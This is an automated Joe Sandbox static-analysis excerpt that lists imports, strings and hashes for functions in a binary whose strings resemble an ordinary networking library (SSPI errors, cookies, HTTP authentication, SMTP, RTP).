                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: ErrorLast_errno$FormatMessagestrchrstrncpy
                                            • String ID: %s (0x%08X)$%s - %s$SEC_E_BAD_BINDINGS
                                            • API String ID: 600764987-2710416593
                                            • Opcode ID: fed2a8485bd53f2b9fc33547e3bf34e68c56676f5b9d2557088d6d2309b96134
                                            • Instruction ID: ea22093c052cb10bc660cee053cbf9bfcb2e47f2c8d0411712ddb02974da50e4
                                            • Opcode Fuzzy Hash: fed2a8485bd53f2b9fc33547e3bf34e68c56676f5b9d2557088d6d2309b96134
                                            • Instruction Fuzzy Hash: 8031502270C68585EB25AB60E4617FEFBA0BF84B44F840137DA9D82A95DF3CD554C731
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: ErrorLast_errno$FormatMessagestrchrstrncpy
                                            • String ID: %s (0x%08X)$%s - %s$SEC_E_BAD_PKGID
                                            • API String ID: 600764987-1052566392
                                            • Opcode ID: f85a2a735a9d920cdfcb51d5e4cf70fc8eb07e7097d1353a9d283ee2013f9742
                                            • Instruction ID: e5ec4c5cf1fe17c70cb16ae4aa584303ab4c58563e93c944095390a43637f115
                                            • Opcode Fuzzy Hash: f85a2a735a9d920cdfcb51d5e4cf70fc8eb07e7097d1353a9d283ee2013f9742
                                            • Instruction Fuzzy Hash: D0314F2270C68585EB25AB60E4607FEFBA0BF84B44FC40537DA9D82A95DF3CD5548731
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: ErrorLast_errno$FormatMessagestrchrstrncpy
                                            • String ID: %s (0x%08X)$%s - %s$SEC_E_CERT_EXPIRED
                                            • API String ID: 600764987-3862749013
                                            • Opcode ID: 034b749fa52bb0e83432a6375c736f1c388a10f79a58ee50a6da77af21e3aa5c
                                            • Instruction ID: d0efb1a1314ff26eda21238b1062642f7529ce7f4f724cd8af48856d3eeaa9b5
                                            • Opcode Fuzzy Hash: 034b749fa52bb0e83432a6375c736f1c388a10f79a58ee50a6da77af21e3aa5c
                                            • Instruction Fuzzy Hash: 4B314F2260C68585EB25AB60E4607FEFBA0BF84B44FC40137DA9D82A95DF3CD554C731
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: ErrorLast_errno$FormatMessagestrchrstrncpy
                                            • String ID: %s (0x%08X)$%s - %s$SEC_E_CERT_UNKNOWN
                                            • API String ID: 600764987-1381340633
                                            • Opcode ID: e079303a299a1b80ca10b30e1ba550ec69c8fd7568ac497db52d7815dacb691d
                                            • Instruction ID: 56148171028790e00b6469c448477814ac5f7322295704645d8cb716e7337f5c
                                            • Opcode Fuzzy Hash: e079303a299a1b80ca10b30e1ba550ec69c8fd7568ac497db52d7815dacb691d
                                            • Instruction Fuzzy Hash: EF314F2260C68585EB25AB60E4607FEFBA0BF84B44FC40137DA9D82A95DF3CD5548731
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: ErrorLast_errno$FormatMessagestrchrstrncpy
                                            • String ID: %s (0x%08X)$%s - %s$SEC_E_CANNOT_INSTALL
                                            • API String ID: 600764987-2628789574
                                            • Opcode ID: da84ee425c665103f0509870f9862496ac41dbffd059b21d0e085cc4c39f0c10
                                            • Instruction ID: 8ad9d27e520be2979fa1108c0abdd85865619e998929e43035475bd89022e624
                                            • Opcode Fuzzy Hash: da84ee425c665103f0509870f9862496ac41dbffd059b21d0e085cc4c39f0c10
                                            • Instruction Fuzzy Hash: 85314F2260C68585EB25AB60E4607FEFBA0BF84B44FC40137DA9D82A95DF3CD5548731
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: ErrorLast_errno$FormatMessagestrchrstrncpy
                                            • String ID: %s (0x%08X)$%s - %s$SEC_E_BUFFER_TOO_SMALL
                                            • API String ID: 600764987-1965992168
                                            • Opcode ID: d6c51fbaba7f869f43a916abab987e5ed6b2a07158bb5033ab135ee3800e9c5b
                                            • Instruction ID: 9a29416538fa3ce91592e317678530ae14a0d69b03b62780f87bed6728210bdb
                                            • Opcode Fuzzy Hash: d6c51fbaba7f869f43a916abab987e5ed6b2a07158bb5033ab135ee3800e9c5b
                                            • Instruction Fuzzy Hash: C4314F2260C68585EB25AB60E4607FEFBA0BF85B44F840137DA9D82A95DF3CD5548731
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: ErrorLast_errno$FormatMessagestrchrstrncpy
                                            • String ID: %s (0x%08X)$%s - %s$SEC_E_CANNOT_PACK
                                            • API String ID: 600764987-1502336670
                                            • Opcode ID: 597226f125e326fc4276559fb01c1fdade4893ea3d3427af41880d6c60d103f9
                                            • Instruction ID: d8581f6caf79f57d74afff6a6a82c4a5bd321773898ca73f18d41c7bebc8fa64
                                            • Opcode Fuzzy Hash: 597226f125e326fc4276559fb01c1fdade4893ea3d3427af41880d6c60d103f9
                                            • Instruction Fuzzy Hash: D7314F2260C68585EB25AB60E4647FEFBA0BF84B44F840137DA9D82A95DF3CD5548731
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: ErrorLast_errno$FormatMessagestrchrstrncpy
                                            • String ID: %s (0x%08X)$%s - %s$SEC_E_ALGORITHM_MISMATCH
                                            • API String ID: 600764987-618797061
                                            • Opcode ID: d12fab4b8c6893375368121d2eff4d50167fa0c363ab1c99d00b3eb034989995
                                            • Instruction ID: f3d6d593678d51729d055fc375db9f6664cfeb4cb0e96c397b6ced12b67374e3
                                            • Opcode Fuzzy Hash: d12fab4b8c6893375368121d2eff4d50167fa0c363ab1c99d00b3eb034989995
                                            • Instruction Fuzzy Hash: 2E317E2270C78685EB21AB60E4607FEFBA0BF84B44F840137DA9D82A95CF3CD544C721
                                            APIs
                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7E5A27A08
                                              • Part of subcall function 00007FF7E5A05840: realloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,FFFFFFFF,00007FF7E5A11655,?,?,00000000,00007FF7E5A119B5), ref: 00007FF7E5A05855
                                              • Part of subcall function 00007FF7E5A05840: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,FFFFFFFF,00007FF7E5A11655,?,?,00000000,00007FF7E5A119B5), ref: 00007FF7E5A0586B
                                            • memcpy.VCRUNTIME140 ref: 00007FF7E5A27828
                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7E5A27979
                                            • memcpy.VCRUNTIME140 ref: 00007FF7E5A27A42
                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7E5A27A4E
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: free$memcpy$realloc
                                            • String ID: Cannot pause RTP$Failed writing RTP data$Got an error writing an RTP packet
                                            • API String ID: 657767516-1165944077
                                            • Opcode ID: f3879a8a08388b93ace09444e092abff1d8c4238582cb68e877fd15ded32fa93
                                            • Instruction ID: f8cb43adc09dd2f93fae801bdeed1f9bc6773c5851554e2ea2b9817e8bbd96ea
                                            • Opcode Fuzzy Hash: f3879a8a08388b93ace09444e092abff1d8c4238582cb68e877fd15ded32fa93
                                            • Instruction Fuzzy Hash: 31717036B09B8986E658EB25E411BB9ABA4FF49B90F844032DF5D97740DF3CE560C312
                                            APIs
                                            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7E5A3E30A
                                            • calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7E5A3E358
                                            • calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7E5A3E3BB
                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7E5A3E4F9
                                              • Part of subcall function 00007FF7E5A322A0: strchr.VCRUNTIME140(00000000,?,?,00007FF7E5A3185F), ref: 00007FF7E5A322E6
                                              • Part of subcall function 00007FF7E5A322A0: strchr.VCRUNTIME140(00000000,?,?,00007FF7E5A3185F), ref: 00007FF7E5A322F6
                                              • Part of subcall function 00007FF7E5A322A0: _strdup.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,00007FF7E5A3185F), ref: 00007FF7E5A32320
                                              • Part of subcall function 00007FF7E5A322A0: malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7E5A32355
                                              • Part of subcall function 00007FF7E5A322A0: strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7E5A3237A
                                              • Part of subcall function 00007FF7E5A322A0: _strdup.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7E5A3239C
                                            • _strdup.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7E5A3E584
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: _strdup$callocmallocstrchr$freestrncpy
                                            • String ID: GSSAPI$GSSAPI handshake failure (empty challenge message)$Kerberos
                                            • API String ID: 370574955-353107822
                                            • Opcode ID: 765f7b10c892f1fb1e6010970bd4640316ed08fb1ae60ff5c030ea6a027f76d4
                                            • Instruction ID: 16416dd283dab9a48ef8709fdc0558d7330f573a4f93a6432c7e066ffe5b9616
                                            • Opcode Fuzzy Hash: 765f7b10c892f1fb1e6010970bd4640316ed08fb1ae60ff5c030ea6a027f76d4
                                            • Instruction Fuzzy Hash: FEA14B32B08B4A86EB509B65E460BADBBA5FF58B88F800036DE4D93754EF38D845C751
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: invalid number; expected '+', '-', or digit after exponent$invalid number; expected digit after '.'
                                            • API String ID: 0-808606891
                                            • Opcode ID: 3ff7f47f9996d535c6382d0025158cafa12b24fe735b2f180ded5116634d41eb
                                            • Instruction ID: aeb490a388189091524cdd8fd1a0fc42c9cf46eeff41d7986c1e1fabff796d6e
                                            • Opcode Fuzzy Hash: 3ff7f47f9996d535c6382d0025158cafa12b24fe735b2f180ded5116634d41eb
                                            • Instruction Fuzzy Hash: ABB16D7250CA8981E7249F28D4603BCB7A1FB15F48FA44532C65EC22D9DF39E985C363
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: _strdup
                                            • String ID: %s cookie %s="%s" for domain %s, path %s, expire %I64d$Added$FALSE$Replaced
                                            • API String ID: 1169197092-2292467869
                                            • Opcode ID: 328f28ee43acbe02e3b55e4857f65d3be118cca83605d292f44299386820e1f1
                                            • Instruction ID: d702f43473cb3be48728258240322babc0952cd067514452aa3e9c34c43d2698
                                            • Opcode Fuzzy Hash: 328f28ee43acbe02e3b55e4857f65d3be118cca83605d292f44299386820e1f1
                                            • Instruction Fuzzy Hash: FD919221A0D78A45FF71AB2190647F9E7A1EF55F44F880037DA8E82691DF3CE4A48372
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: _strdup
                                            • String ID: Authentication problem. Ignoring this.$Basic$Bearer$Digest$Ignoring duplicate digest auth header.$NTLM$Negotiate
                                            • API String ID: 1169197092-907567932
                                            • Opcode ID: 2edee1d6d6b9369a94ec35f2711a8e3ce3417dfda42f4832661bacb91708de52
                                            • Instruction ID: ae3b349d869a6cf6972c0a2c814d0d86fdd1e1839c33142b5397835c609fb2ae
                                            • Opcode Fuzzy Hash: 2edee1d6d6b9369a94ec35f2711a8e3ce3417dfda42f4832661bacb91708de52
                                            • Instruction Fuzzy Hash: AA71E9A1B0C28E46F7546B229665B7AFED2AF01F88F844036DE5AC71C1DF3CE4548722
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: _strdup
                                            • String ID: %s cookie %s="%s" for domain %s, path %s, expire %I64d$Added$FALSE$Replaced$__Host-$__Secure-
                                            • API String ID: 1169197092-978722393
                                            • Opcode ID: 8bdde5ae7f6a45b5a7f26c8991cb0c6dd01dc0cbdf0c72bd889af76c7a23e672
                                            • Instruction ID: 935aa3c453e39ccf039763b440ac43e808c5dfeac8043a1e8dc26ca6c73223cc
                                            • Opcode Fuzzy Hash: 8bdde5ae7f6a45b5a7f26c8991cb0c6dd01dc0cbdf0c72bd889af76c7a23e672
                                            • Instruction Fuzzy Hash: 1F718321A0D78A45FF71AB2590647F9A791EF54F54F880037DA8D82691DF3CE4948332
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: free$strchrstrtol
                                            • String ID: %s%s%s$Connecting to hostname: %s$Connecting to port: %d$anonymous
                                            • API String ID: 137861075-1224060940
                                            • Opcode ID: ae296eaaf9617ce67e340360966fd7ce56b0ec3a65961541972d05b3815a59bf
                                            • Instruction ID: 27cedc334a5d6b033cfce95493b4d3e4421605be4c953048f03f12214975427f
                                            • Opcode Fuzzy Hash: ae296eaaf9617ce67e340360966fd7ce56b0ec3a65961541972d05b3815a59bf
                                            • Instruction Fuzzy Hash: 9251FA22B08BC684EB21AF25A860BA9ABD0FF45F98F844136DE5D87785CF3DD545C312
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: _strdupfreestrpbrk
                                            • String ID: SMTPUTF8$%s %s%s$EXPN$HELP$VRFY %s%s%s%s
                                            • API String ID: 1812939018-2300960079
                                            • Opcode ID: ec7dde51753d90db8e99e92e45708158327cfa7a3992d6b3b56b6418e18a2dea
                                            • Instruction ID: f2f17f79ad2ad80b1205e4aab62576de2b4fcf724b1602df701bd56949b903be
                                            • Opcode Fuzzy Hash: ec7dde51753d90db8e99e92e45708158327cfa7a3992d6b3b56b6418e18a2dea
                                            • Instruction Fuzzy Hash: 22519126B08B8981EB11AB11E420BB9AFA0FF45F84F844132DA8D93B95DF3CE545C752
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: free
                                            • String ID: ALL$FLUSH$RELOAD$SESS$Set-Cookie:
                                            • API String ID: 1294909896-1147549499
                                            • Opcode ID: 9b66fc2e34baff06f096cbca24ff7e3129ac13fcb66a14bdd11d473ac3b2e9fc
                                            • Instruction ID: 2820acbdf4f4075be85bd2b7aad32d908021a58c8eaba0d7dcf1a3dc27dd93ce
                                            • Opcode Fuzzy Hash: 9b66fc2e34baff06f096cbca24ff7e3129ac13fcb66a14bdd11d473ac3b2e9fc
                                            • Instruction Fuzzy Hash: BD413E10B1C51A42FA24BB256A217F9D691AF94F80FD84033DA0EC76D6DF3DE4618372
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: _strdup$callocfreestrrchr
                                            • String ID: Wildcard - Parsing started
                                            • API String ID: 2641349667-2274641867
                                            • Opcode ID: 7821651418ac284b7fe37018b700e1dd8bffd1ee22ba97486258aa5e4425af75
                                            • Instruction ID: db1e180cc8b9100b1d38b01298c72b09b4675c9813a9221e2052ec9803c5c080
                                            • Opcode Fuzzy Hash: 7821651418ac284b7fe37018b700e1dd8bffd1ee22ba97486258aa5e4425af75
                                            • Instruction Fuzzy Hash: D5517E36B09B4681EB14EF15E461AB8BBA5FF84F44F854036CA8E97350DF38E444C321
                                            APIs
                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,00000000,00007FF7E5A010B9,?,?,00000000,00007FF7E5A015F5), ref: 00007FF7E59F96CD
                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,00000000,00007FF7E5A010B9,?,?,00000000,00007FF7E5A015F5), ref: 00007FF7E59F96F7
                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,00000000,00007FF7E5A010B9,?,?,00000000,00007FF7E5A015F5), ref: 00007FF7E59F9701
                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,00000000,00007FF7E5A010B9,?,?,00000000,00007FF7E5A015F5), ref: 00007FF7E59F970B
                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,00000000,00007FF7E5A010B9,?,?,00000000,00007FF7E5A015F5), ref: 00007FF7E59F9715
                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,00000000,00007FF7E5A010B9,?,?,00000000,00007FF7E5A015F5), ref: 00007FF7E59F971F
                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,00000000,00007FF7E5A010B9,?,?,00000000,00007FF7E5A015F5), ref: 00007FF7E59F9729
